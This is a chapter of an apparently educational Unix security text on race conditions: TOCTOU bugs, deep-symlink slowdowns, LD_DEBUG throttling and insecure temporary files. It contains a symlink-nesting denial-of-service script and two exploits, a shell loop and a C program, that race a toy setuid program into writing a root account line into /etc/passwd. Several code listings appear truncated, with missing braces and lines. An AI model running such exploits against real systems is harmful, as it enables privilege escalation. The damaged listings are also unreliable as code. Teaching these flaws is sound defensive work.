Next Previous Contents

9. Race conditions

A race is a timing dependence between two events.

9.1 Time between test and execution

It is quite common to see code in the style

        if (doing_this_is_allowed)
Now suppose that we can set up things in such a way that at the moment of the test the world is still innocent, but at the moment of do_it() things have changed. Then even a somewhat careful program can be tricked into doing something that it shouldn't.

Such things seem difficult: only a few microseconds to play with. But there are methods to slow down time and turn microseconds into seconds.

Deep symlinks

An old trick is to use a filename with deeply nested symlinks. One can force the kernel to take almost arbitrarily long time accessing a single file. Below a script from Rafal Wojtczuk, but the idea was known much earlier.

# by Nergal
mklink() {
  while [ $I -lt $ELNUM ] ; do
  ln -s "$P"l$2 l$IND

if [ $# != 1 ] ; then
        echo A numerical argument is required.
        exit 0


mklink 4
mklink 3
mklink 2
mklink 1
mklink 0 /../../../../../../../etc/services
mkdir l5
mkdir l

What does this do? Let us call the script mklink. A call ./mklink 3 creates the situation

drwxr-xr-x    2 aeb      4096  l
lrwxrwxrwx    1 aeb        53  l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services
lrwxrwxrwx    1 aeb        19  l1 -> l2/../l2/../l2/../l
lrwxrwxrwx    1 aeb        19  l2 -> l3/../l3/../l3/../l
lrwxrwxrwx    1 aeb        19  l3 -> l4/../l4/../l4/../l
lrwxrwxrwx    1 aeb        19  l4 -> l5/../l5/../l5/../l
drwxr-xr-x    2 aeb      4096  l5
with two empty directories l and l5, and symlinks l1, l2, l3, l4 that hesitate 3 times where they want to go, but finally go to l, and a symlink l0 that hesitates 3 times where to go but finally goes to some arbitrary given file. Giving mklink some larger parameter causes symlinks that hesitate more. Some timing on a random machine of the command head -1 l0:
depth time
5 0.02 sec
10 0.47 sec
15 3.3 sec
20 13.3 sec
25 39 sec
30 1 min 35 sec
35 3 min 23 sec

Exercise What is the expected time dependence on the depth?

With somewhat larger values for the depth one can make a single lookup take hours or even weeks - during this time no schedule happens, so the machine is dead, an easy local DOS.

Linux kernels since 2.2.20/2.4.11 have a limit on the depth of nesting and on the total number of symlink dereferences allowed during a lookup to avoid this problem.

LD_DEBUG output throttling

Setting the environment variable LD_DEBUG to some value (try LD_DEBUG=help and LD_DEBUG=all) causes output to be generated to stderr. This will slow a program down. If stderr is redirected to a pipe, then the pipe will fill up quickly, and by reading cautiously from the other end one can slow down and stop a setuid binary at a given point.

Scheduling priority

Niceness values usually range from -20 to 19 or 20. Processes with negative niceness get high priority. Some CD burning programs like that. Processes with positive niceness get low priority, and often a process with niceness 19 or 20 only runs when nothing else in the system wants to. Starting a process with nice(19) will make it go really slow.

An exploit

Here a 2003 SunOS at exploit by Wojciech Purczynski. It removes arbitrary files from the filesystem by calling at -r file. Now the setuid at is careful, and does a stat() to check that you are the owner of the file before removing it. But if time is slow, one can change the world between the stat(file) and unlink(file) system calls, and make file a symlink to the file one wants to remove.

A toy example

Look at the following silly baby program. It is setuid root, and will add a message with time stamp to a file, but only if the file is owned by the user. The interesting part of the source code goes

        if (stat(fname, &buf) != 0 || buf.st_uid != getuid())
                f = fopen(fname, "a"); ...
So, there is a race here - the fname used in the fopen() may differ from the fname used in the stat().

First exploit: hit at random and hope.

        touch myfile
        while true; do
                ln -sf ./myfile a &
                ./addmsg a 'w00t::0:0:w00t::/bin/bash' &
                ln -sf /etc/passwd a &
This works on my machine, maybe once every 1 or 2 minutes on average. Details very much depend on what other activity there is on the machine.

Second exploit: use LD_DEBUG throttling.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

int main() {
        char buf[1000];
        FILE *p;
        int done = 0;

        system("rm -f a; touch ./myfile");
        if (symlink("./myfile", "a")) {
                perror("first symlink");
                return 1;
        p = popen("LD_DEBUG=all ./addmsg a ochoch 2>&1", "r");
        if (p == NULL) {
                fprintf(stderr, "cannot open pipe\n");
                return 1;
        setbuf(p, NULL);
        while (fgets(buf, sizeof(buf), p)) {
                if (!done && strstr(buf, "getuid")) {
                        if (symlink("/etc/passwd", "a")) {
                                perror("second symlink");
                                return 1;
                        done = 1;
        return 0;
This is a precision exploit. No random hitting. It just works. (Unfortunately LD_DEBUG is no longer honoured in setuid binaries since glibc 2.3.4.)


A famous exploit involving a race was published by h00lyshit. See below.

9.2 Temporary files

Many programs make use of temporary files with predictable names. They create them, write to them, read them and remove them. Creative use of symlinks in /tmp may trick such a program to execute arbitrary commands, or to remove arbitrary files.

This may be a straightforward bug, no timing involved, if the temporary file has a fixed name like /tmp/foo.tmp or /tmp/shtmp$$ (where $$ will be expanded to the process ID) and the name is used without testing.

It becomes a race if before use either the program tests that no such name exists already, or the program removes any such file.

sh redirection

In 2000 it was noticed that many incarnations of the shell (sh, ksh, tcsh, ...) create temporary files in an insecure way. For example, so-called here-documents are pieces of text in a shell script that are to be fed to some command. One writes

command << EOI
some text
more text
The shell implements here-documents by writing the text to a temporary file, opening it, giving the file descriptor to the command as stdin, and removing it again when the command has finished (or even before the command is started, just keeping the open filedescriptor as only reference). By having symlinks in place before the shell is used (say, via a script invoked by root), one can overwrite arbitrary files or do other interesting things.

On recent systems this has of course been fixed. Let us investigate (SunOS 5.7).

% echo $$
% ls -l /tmp << EOI
total 48
-rw-r--r--   1 aeb      4 Apr  1 16:34 sh15121
% ls -l /tmp << EOI
total 48
-rw-r--r--   1 aeb      4 Apr  1 16:34 sh15122
% ln -s /tmp/foo /tmp/sh15123
% ls -l /tmp << EOI
total 64
-rw-r--r--   1 aebr     4 Apr  1 16:36 sh15124
lrwxrwxrwx   1 aebr     8 Apr  1 16:35 sh15123 -> /tmp/foo
% truss sh
read(0, 0x00038770, 128)        (sleeping...)
date << EOI
read(0, " d a t e   < <   E O I\n", 128)        = 12
open64("/tmp/sh19450", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
read(0, 0x00038770, 128)        (sleeping...)
read(0, " E O I\n", 128)                        = 4
fork()                                          = 1946
unlink("/tmp/sh19450")                          = 0
That is, on this system here-documents are called /tmp/sh$$N, where $$ is the PID of the shell, and N is a counter. They are opened with mode O_RDWR|O_CREAT|O_EXCL, and the O_EXCL part will make sure that the file did not exist already. If it exists, N is incremented.

By the way, the program truss that we used here is an extremely powerful tool to find out what a program is doing.

Let us try again on a Linux machine. We see with strace (the Linux analog of truss):

open("/tmp/sh-thd-1073814528", O_WRONLY|O_CREAT|O_TRUNC|O_EXCL|O_LARGEFILE, 0600) = 3
... here-document is written ...
open("/tmp/sh-thd-1073814528", O_RDONLY|O_LARGEFILE) = 4
unlink("/tmp/sh-thd-1073814528") = 0
dup2(4, 0)                  = 0
So here the temporary here-document is unlinked already before invocation of the command.

Next Previous Contents